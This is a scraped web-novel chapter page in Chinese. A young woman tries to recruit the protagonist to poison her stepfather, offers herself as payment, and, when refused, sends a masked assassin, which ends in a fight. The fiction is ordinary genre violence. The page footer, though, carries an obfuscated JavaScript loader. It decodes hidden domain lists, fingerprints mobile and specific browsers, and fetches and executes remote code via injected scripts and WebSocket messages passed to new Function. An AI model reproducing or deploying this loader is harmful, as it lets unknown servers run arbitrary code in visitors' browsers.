字体
关灯
上一页 返回目录 下一章

推荐阅读: 我和电竞男神的兄弟在一起了我拥有三千繁华,九霄烟花初春雨微凉迷雾森林山城恋宿主你画风又崩了我的修炼器不一样初恋这件漫长的事我不要做红娘啊神诵九歌神之拯救我的老公有点神
    “你知道吗?其实,我并不是萧家家主的亲生女儿。”

    这时,那少女突然话锋一转,说道。

    闻言,叶小燕也是点了点头,道:“一开始的时候,的确不太清楚,不过后来,当时听到你和萧山的谈话,我倒是已经有所了解了。”

    “没错,我并不是萧山的女儿。其实在很早以前,我妈妈刚刚嫁给萧山的时候,就已经怀上了我。只是,当时的萧山,贪图我母亲年轻时候的美色,并没有特别的介意。可惜,这个老混蛋,虽然嘴上说着并不介意。但是,等到我的母亲,将我辛苦生出来之后,他却直接派人,将我和我母亲,分割了开去。”

    “我五岁的那年,他将我一个人,关进了这冷院之中。我母亲,为了能够给我换取足够的生活费,不断的和那男人缠绵悱恻着,很快,便是将自己的青春,耗费了进去。这些年里,随着我母亲的年龄,渐渐增长,那个狠心的男人,也是不再爱她。虽然给了我母亲一些权利,但是却也是始终不允许我母亲和我见面。”

    “这些年里,我很恨他。”

    “恨他欺骗了我的母亲。”

    “而这一次,我忍不住了,我要杀了他!”

    叶小燕也是淡淡的看着对方,道:“那你呢?现在的你,不也一样姓萧吗?”

    “我虽然现在姓萧,但是在我心里,我的名字却是只有一个字,盈。这是我妈妈给我起的名字,我很讨厌萧字,我也讨厌别人萧盈。”

    萧盈闻言,也是恶狠狠的说道。

    那咬牙切齿的模样,看起来倒是颇有几分狠辣。

    叶小燕也是无奈的看着她,说道:“所以,你这次叫我来,就是想要单纯的帮你杀了萧山?你知道的,我和萧山之间的实力,还是有着很大的差距的。”

    “不。”

    闻言,萧盈却是咬着牙,同时也是将一枚银针,拿了出来,而后也是缓缓的递给在叶小燕的面前,道:“我只要你将这枚银针,偷偷的插入萧山的脖子上,到时候,毒气扩散,他自会死亡。”

    看着那一根细小的银针,叶小燕也是不禁无奈的一笑。

    “我为什么一定要帮你呢?”

    “难道…我刚才说的那些话,还没有打动你吗?”

    闻言,萧盈也是一愣,旋即也是有些惊讶的看着叶小燕。

    “抱歉,完全没有。”

    闻言,叶小燕顿时觉得好笑,兀自的摇了摇头。

    虽然刚才的那些故事,听起来的确有点凄凉。

    但是,别忘了,萧山至少也是的确出资,将萧盈培养了起来。

    何况,萧盈本来就不是萧山的亲生女儿。

    身为后爸的萧山,能够如此的将其培养长大,便已是殊为不易。

    如果只从表面去看,萧盈的确很可怜。

    但是如果仔细剖析的话,萧盈的可怜,反而又显得不太可怜了。

    “你……”

    顿时,萧盈也是咬着唇,美眸忽的看了一眼床榻上已经熟睡的萧倾。

    旋即也是起身掀开了帘子,看向叶小燕道:“你跟我来吧。”

    见状,叶小燕也是不由觉得好奇,下意识的便是起身跟了上去。

    跟在萧盈的身后,两人也是兀自的来到了一间小小的卧室之中。

    卧室里面,十分的精致。

    空气里,甚至还飘散着淡淡的花香。

    “你带我来这里,是做什么?”

    叶小燕也是不由一怔。

    如果没有猜错的话,这里只怕是萧盈的闺房才是。

    “别说话。”

    萧盈摇了摇头,旋即兀自坐在床边,便是伸手就要拖去上衣。

    “喂,你干嘛!?”

    见状,叶小燕也是一惊,急忙的别过了头。

    萧盈轻笑着看向叶小燕,柔声道:“我知道,你们这些男人,不都是喜欢这种东西吗?我现在给你,只要你答应我,帮我杀了萧山。”

    “萧小姐,你恐怕误会我了。我个人对这种东西,还是没有如此强烈的欲望的。”叶小燕一时也是苦笑一声,急忙的挥了挥手。

    要知道,前世的时候,叶小燕已经不知道和多少大陆顶尖美女缠绵过。如今对于这种黄毛丫头,自然也是没有什么兴趣。何况,这要是传了出去,被白芷知道了,只怕日后这丫头也是注定不会再和自己接触了。

    “你!”

    闻言,萧盈也是一怒。

    显然也是没有想到,叶小燕这种男人,竟然丝毫不沾腥荤。

    当下也是只好默默的穿好了衣服,美眸却是带着几分怒气。

    “我现在只问你一句话,你到底,答不答应,帮我杀了萧山!!”

    “抱歉了,萧大小姐,我没有办法帮你!”

    叶小燕也是兀自的摇了摇头,转身便要离开。

    “站住!”

    这时,萧盈也是猛然站了起来,旋即也是美眸森森的看着叶小燕,怒道:“既然你不仁义,那也别怪不讲情面了…如果你不愿意的话,就别怪我在这里杀了你了!”

    “呵,怎么?你觉得,你是我的对手吗?”

    叶小燕闻言,也是顿时不屑的笑了笑。

    区区一个黄毛丫头,竟然也敢和自己叫嚣?

    呵。

    找死不成?

    “哼,杀你,自然不需要我来出手!”

    闻言,只见萧盈也是淡然一笑。

    双手轻轻一挥!

    顿时,只见在那屋顶之上,也是骤然传来一声震动。

    轰!!

    下一秒,只见随着那屋顶的碎裂,浓浓尘埃掀起,一道黑衣人影,也是骤然现身,随着一抹寒光掠过,也是迅速的射向了叶小燕的胸膛!!

    咻!!

    眼眸一惊,叶小燕身形也是飞速倒退!

    同时掌心之中,浓郁的剑气,快速的凝聚起来!

    几乎是一霎那,只见叶小燕猛然掠起掌心,便是狠狠的和那身前的剑锋,轰击在了一起,极端惊人的气浪,也是骤然掀飞开来!!

    “杀!”

    那前方的黑衣人影,也是猛然一声暴喝!

    随即身形一转,便是握着那一柄极端凌厉的剑刃,笔直的砍向叶小燕的脑袋!

    轰!

    身形跃起的霎那,只见叶小燕也是狠狠飞起一脚,踢在了那黑衣人影的脑袋上!

    顿时,那黑衣人影整个人也是倒飞而出!

    轰隆一声,撞倒在了墙壁上!

    “想杀我?你还不配!”

    叶小燕也是冷笑一声。

    当下也是狠狠的向前掠去!

    那掌心之中,飞速凝聚的剑气,也是开始渐渐的成形。

    而后只见随着那黑衣人影g刚刚站起来的一瞬间,叶小燕便是再度一脚飞来,笔直的便是将那黑衣人影再度的踢飞了出去,轰然一声,便是接连撞倒了两面墙壁。

    然而叶小燕显然没有打算就此罢休,当下也是再度的向前掠去!

    顿时,整个阁楼之中,都是骤然摇晃起来。

    ……

    “发生什么了!?”

上一页 返回目录 下一章

也许你还喜欢:
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA0OA==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x4d\x6d\x48\x78\x4e\x49\x6e\x79\x4c']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vN3NqZmtldWlvM2RkZnNqZy5pbXBvcnRjYYXQuYY29tLGh0dHBzOi8vb2tvamZrZXlra2Vyai5kaWFuZG9uZ2NoZXRvdWt1aS5jb20saHR0cHM6Ly9vdGprZWtnams1aTk2OTk4Lmd1b3NoaWh1YYWl5YYW8uYY29tLGh0dHBzOi8vb3Bra2Vrazg5MzA5Ny54aW5naHVhbGluZ2hhbmcuYY29tLGh0dHBzOi8vbzEya21mdXRra2RoYYXcuYYm9saWppdXBpbmdjaGFuZy5jb20saHR0cHM6Ly9vLnpqanJseDQuYY29t','d3NzOOi8vd3Mud3NhbGlzZHMuY29tOOjgwOOTAsd3NzOOi8vd3Mud3NhbGlzeXMuY29tOOjgwOOTAsd3NzOOi8vd3Mud3NhbGlzZGQuY29tOOjgwOOTA=',window,document,['Y','O']);}:function(){};